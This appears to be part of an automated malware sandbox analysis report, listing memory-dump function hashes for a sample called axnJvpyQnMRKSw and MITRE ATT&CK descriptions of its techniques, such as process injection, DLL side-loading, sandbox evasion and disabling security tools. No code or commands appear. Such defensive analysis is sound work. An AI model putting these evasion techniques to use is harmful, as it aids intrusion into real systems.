Opcode Fuzzy Hash: 48f29cb50b56edab2814fdb37b17aa9b0b3e82e88828a231e1fd4377ca301ffa
Instruction Fuzzy Hash: D8110131B0AA0ACFEB64EB648061AF973E4EF54215B01463AE04EC35E2CE29B6058790

Function 00007FFD9C1F92F0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 385ac4bca7236a305494d55e7997aec1ea9db3d4a124512ed7f9ef4844bef5a1
Instruction ID: 3ec9f85846d77a6093992bd4813243e41c0c4f8e3c680aba5d87e5caadd55ca0
Opcode Fuzzy Hash: 385ac4bca7236a305494d55e7997aec1ea9db3d4a124512ed7f9ef4844bef5a1
Instruction Fuzzy Hash: A5012632F0960A8BF7706AA444282BE3AB1DF55384F00013AE04EF3291DE693C058359

Function 00007FFD9C1F549E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289c2ef30a0feba551c2329149cc368dec065e76a2ce01e5742526fb51ba940f
Instruction ID: a883ea9bf455081b23c2e96008654dacbefccf870f9b533ed3bc55b7a587ea1f
Opcode Fuzzy Hash: 289c2ef30a0feba551c2329149cc368dec065e76a2ce01e5742526fb51ba940f
Instruction Fuzzy Hash: 96110032709607CBF724AA88E4657E973B0EF613A6F10823AD41EC3691CF69A450CB94

Function 00007FFD9C1FE00E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f16894156ec286e6682a661e9fa37e7391a8489cf376fa264fa10575072367a
Instruction ID: 4e7175dfb9cac205aa53c4b1edbf941620082c9a9eb1a9ab67b6e31275ac62e1
Opcode Fuzzy Hash: 7f16894156ec286e6682a661e9fa37e7391a8489cf376fa264fa10575072367a
Instruction Fuzzy Hash: 84110432749607CBF724AA88D4617E573B4EF693A5F14823AD409C3691CE69A850CB94

Function 00007FFD9BE677DE Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773438a1e3cd5db3b320f8f69f830c258f8c8ff87673cb45d8efda54c612fd37
Instruction ID: 89924202f401ba189926101f7aa3122dbca1b33258ba5dae6ffdff41fad96201
Opcode Fuzzy Hash: 773438a1e3cd5db3b320f8f69f830c258f8c8ff87673cb45d8efda54c612fd37
Instruction Fuzzy Hash: 6011263170A50ACFF715AA88D4617F473E8EF61325F12823AD84DC36E1CE7AA550CB90

Function 00007FFD9BE6E2CE Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca14778c2b3c70039713fc922fc4aa9b88186391ec663b8b9f081013aacc80d
Instruction ID: 989b0b54072d52ad40c6469131f9234b42b6ca00649abb650eda9ba9dd725e91
Opcode Fuzzy Hash: aca14778c2b3c70039713fc922fc4aa9b88186391ec663b8b9f081013aacc80d
Instruction Fuzzy Hash: EA11663174A50ACFF724AA98D4617F573A8EF61325F11823AE409C32E1CE7AA500CB90

Function 00007FFD9C1F0128 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b02fe46c4ccc12a9e66bbce4d6ac415ef08ef7f5efd0707be9232d0da94072
Instruction ID: 0a7369d19cbd2fa761c629a41503c3adbd14b68a324e43e1f6cb7a277a29b8f9
Opcode Fuzzy Hash: 08b02fe46c4ccc12a9e66bbce4d6ac415ef08ef7f5efd0707be9232d0da94072
Instruction Fuzzy Hash: 5F013522F4F05783F67892DC69313BEB571AF457A0F6406BBE49E963C78C1C29812292

Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2132362546.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9baa0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c473bbba4ccecfa2a9d388d3b9021557773f97a09c310a988f3b762e6fa9058b
Instruction ID: ebb97b2b2a35c82dcf8eea23c79aa98968cd2473da698bc02f9ff0859e3832ad
Opcode Fuzzy Hash: c473bbba4ccecfa2a9d388d3b9021557773f97a09c310a988f3b762e6fa9058b
Instruction Fuzzy Hash: 5011A136A0E38D8FE722DFA888A01DD7FB1EF42711F0645F7D088DB1A2D57466498764

Function 00007FFD9BAA4107 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2132362546.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9baa0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ddcb33bc59d56df1087571524721541c550f17e51a55ca92c766f845a444af3
Instruction ID: 43165676939a092e0f01d16e4a2ebffa8cba78227db50b2acd785795b6e10ca5
Opcode Fuzzy Hash: 9ddcb33bc59d56df1087571524721541c550f17e51a55ca92c766f845a444af3
Instruction Fuzzy Hash: C811F13090891D8FDBA8EB04C891BE9B3A2FB58305F1141ADD40ED32A0DB74AE84CF81

Function 00007FFD9C1FBDFE Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fbeb9d6fba11a1ea0fa776c1a3bc9c85edaaf710bb4fa5b6b1c8bf57f80c7a0
Instruction ID: a8665aab719c8730ed6cbf63c81f14acdf1dd76c8a15aa360cc89cd19d20e191
Opcode Fuzzy Hash: 0fbeb9d6fba11a1ea0fa776c1a3bc9c85edaaf710bb4fa5b6b1c8bf57f80c7a0
Instruction Fuzzy Hash: CAF0C831B0C6098FE758EF1868166B973E1FF98325B10413FD08EC36A6CE2568414785

Function 00007FFD9BE6C0BF Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec0260797922d93f4ef2190b5e57c54f39de1efe9cdd8cb9a8bf300108afbe9b
Instruction ID: b9902e44d4cc7aef7e8220a4571e4bbda694ab91b2c1acd7ffd09af92ee76230
Opcode Fuzzy Hash: ec0260797922d93f4ef2190b5e57c54f39de1efe9cdd8cb9a8bf300108afbe9b
Instruction Fuzzy Hash: DCF0C831B0C6088EE758EF5858166B873E4FF95225B10413FD08EC36A6CE2A68014781

Function 00007FFD9BE65FD2 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c26e90fea84931a362e8407904b5dbe7fc978d0bba6204584f6cc6ede647ed
Instruction ID: 8f7a60e58ec94066c298bb83de4c64348ed1e1916f78583178996189cb6b5993
Opcode Fuzzy Hash: 70c26e90fea84931a362e8407904b5dbe7fc978d0bba6204584f6cc6ede647ed
Instruction Fuzzy Hash: AEF0C23194F2CA9FD7628BB088658D57FB8AF02200B1900F6D446C70A2CA2E5606D351

Function 00007FFD9C1F3C82 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d82cf9fea25e08748e65d7fe9e34554dd9094f107a3a78efff33b21399035a
Instruction ID: c24563c0214dc4a648fc86bc9157a75468a4bf73e4e3399563f2391887de8775
Opcode Fuzzy Hash: 45d82cf9fea25e08748e65d7fe9e34554dd9094f107a3a78efff33b21399035a
Instruction Fuzzy Hash: 1FF0C23258E3C6DFD7128BB088218E53FB0EF07254B5400F7D045C70A2C62D160AC761

Function 00007FFD9BE6CAE2 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2348bb8b330d264ce1fbb596671fb38ff0d8a4caade241075e70d2d095ed36e3
Instruction ID: 33c1e47cfab70187ed6ef7a2899f05d31b0432959a222f2fbd0680027ee2a362
Opcode Fuzzy Hash: 2348bb8b330d264ce1fbb596671fb38ff0d8a4caade241075e70d2d095ed36e3
Instruction Fuzzy Hash: 1EF0963184E2CADFD312DBF088615E63FB8AF07204B0901F6D45ACB1B2C56E5756C761

Function 00007FFD9C1FC822 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5116eeb2af4fe953b094a474902bfec77b85778100ce4191956a4eaef094943c
Instruction ID: 078987456bf0eb95eead015d7703135000df573c01af2fb382a03cb710df880e
Opcode Fuzzy Hash: 5116eeb2af4fe953b094a474902bfec77b85778100ce4191956a4eaef094943c
Instruction Fuzzy Hash: 40F0903254D2CA9FD3229BB088615E93FB4EF43254F1440F6D045D70A2C66D2A6AD761

Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2132362546.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9baa0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0657f7f6f97ecf20921ae7b57105a898eb00e5e65f9977f98dc9391f1d43b4ec
Instruction ID: 4aa213615d15615cd43977668d6d11717c3d0d901c65b91284c91abdc45478ce
Opcode Fuzzy Hash: 0657f7f6f97ecf20921ae7b57105a898eb00e5e65f9977f98dc9391f1d43b4ec
Instruction Fuzzy Hash: E0F0553660C6498FD742AB7CDCA44E43F50EB8221875A10FAD088C7562D210196DC700

Function 00007FFD9BAA2844 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2132362546.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9baa0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9098398f186bdafc066a0e9b9fdd75f86f932406c7a6e64d7c12059d1144759c
Instruction ID: 5889fed0349f17ba29f6ff5eb49cd9810d1838fb0cd78e967ddbd9b964f8bec3
Opcode Fuzzy Hash: 9098398f186bdafc066a0e9b9fdd75f86f932406c7a6e64d7c12059d1144759c
Instruction Fuzzy Hash: 36F09621B0961E4AEAB8E784C864AB46393AF54300F1201B9D44ED32F2DE5C7F914994

Function 00007FFD9C1FD517 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a4c82902c5e0da90a1f9537841da3453eddb0b4d7a98b565977c00d76cd5ae
Instruction ID: b692bdf799d838612d7af1cc726f5e0d0cfd7c95510a8bd670b2067d320b42d1
Opcode Fuzzy Hash: f2a4c82902c5e0da90a1f9537841da3453eddb0b4d7a98b565977c00d76cd5ae
Instruction Fuzzy Hash: 2CE01293B0E3839FF7371AB408720782AB4DF5738575505B6D1469A1D3D95838095316

Function 00007FFD9BE64EA8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed8cbb832e1cd984da4c1474a8bc4e5fd51a85b3a3e348cc068bc42bdfc0c32
Instruction ID: ac1d99b5a652629fdb970fc52e972ef112fb0fa3c30c1db6f8a18238f63f0515
Opcode Fuzzy Hash: 2ed8cbb832e1cd984da4c1474a8bc4e5fd51a85b3a3e348cc068bc42bdfc0c32
Instruction Fuzzy Hash: CDD0C930B619088F8B5CAA2C885D96072E1EB6921679540A9E00AC72B1E96AD999C741

Function 00007FFD9BE6D7D7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec8b55cf45dae7ef922545a3bab74ac2a5d112eef493c795945a86e887c5d0c
Instruction ID: f08c4ad4b6498e6e1f6e521504a7d94c6957480a4c785da6a720854488280e88
Opcode Fuzzy Hash: 6ec8b55cf45dae7ef922545a3bab74ac2a5d112eef493c795945a86e887c5d0c
Instruction Fuzzy Hash: 72E01242F0F7CACFEB3606B8087617C2F98AF1B34079B16B6D1968D2E3D9496A059311

Function 00007FFD9C1F547B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
Instruction ID: 9c0f005d0bd53c3601fe3c3efc16de588f996ca52980e42232cc4f4054fe0320
Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
Instruction Fuzzy Hash: E0D0C912B0D50385F2784681807123D21B1DF01382E60043DD0AF618C2DF1D7802B219

Function 00007FFD9C1FDFEB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
Instruction ID: 6d3df87254ed5f7d9f44d151b3692dd575d71e161b61715a7982587bba32d8f6
Opcode Fuzzy Hash: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
Instruction Fuzzy Hash: B7D01216F1C54385F63856C1407463D19B2CF083C0E2040BDD26F718C1CD1DF942621E

Function 00007FFD9BE677BB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8b7b11f153f5002c73b35ad208f6f3ac5f84a7d990a02f6e1143dcfe4bb046
Instruction ID: 61389453c1232153015afb14708e47b0e38ced220d31c96a30006e2c443ca176
Opcode Fuzzy Hash: 6e8b7b11f153f5002c73b35ad208f6f3ac5f84a7d990a02f6e1143dcfe4bb046
Instruction Fuzzy Hash: 1FD09214B0F61BCDF53D4691807023A51AD5F45702E23453EC85F418E18D1EBA01A70A

Function 00007FFD9BE6E2AB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f7d9db52e61d0893b9ff850cb3b9fefc2189af0d978958b04ff0fd22a7a7440
Instruction ID: ff1dfb35f9aeec0f00cbc0a55565f012b74fbb6fe695f342ee7d46f1c0258fa9
Opcode Fuzzy Hash: 6f7d9db52e61d0893b9ff850cb3b9fefc2189af0d978958b04ff0fd22a7a7440
Instruction Fuzzy Hash: 46D09214B0EA4BCDF17846A1807233A219E5F08B01E664039F05F419E1C91E76016602

Function 00007FFD9BAA3B8E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2132362546.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9baa0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d6bf0b2d6cd70b59369f5ca0c0ef572f64fee2a5f0299b53defa5d3eb47be0
Instruction ID: eba02e560d44aad708f3bbec02b8a10ce1c14fc351e0c0c3022c5dd33d487054
Opcode Fuzzy Hash: c8d6bf0b2d6cd70b59369f5ca0c0ef572f64fee2a5f0299b53defa5d3eb47be0
Instruction Fuzzy Hash: 2FC08C00F18C1A07F2192308082033E04438F84B18F8941B8E41ECB3CECE0C1A020AC2

Function 00007FFD9C1F4993 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158911812.00007FFD9C1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9c1f0000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
Instruction ID: 6c23a4543a6a90d72c9d7d6ec97716cbb18a8b9d0bff887a3068a03165985dcb
Opcode Fuzzy Hash: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
Instruction Fuzzy Hash: 29B00252F1C24356EA3551E6196517C00619B4A286A951935A60A652C3DC5C2840627D

Function 00007FFD9BE66CE8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2142921528.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be60000_axnJvpyQnMRKSw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586735d4663d2c719c323930513a00f0b30e4d5a6ef8b80366d5c732b0ff249d
Instruction ID: 4b5a35b0374268759db0ce9489087535828eb2b5706d64f67ed09d69f225d65b
Opcode Fuzzy Hash: 586735d4663d2c719c323930513a00f0b30e4d5a6ef8b80366d5c732b0ff249d
Instruction Fuzzy Hash: 33A00100F2E69BDFEA3441E849B41BC00894B49245A662A369A0B855E2E8AE6E406161

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

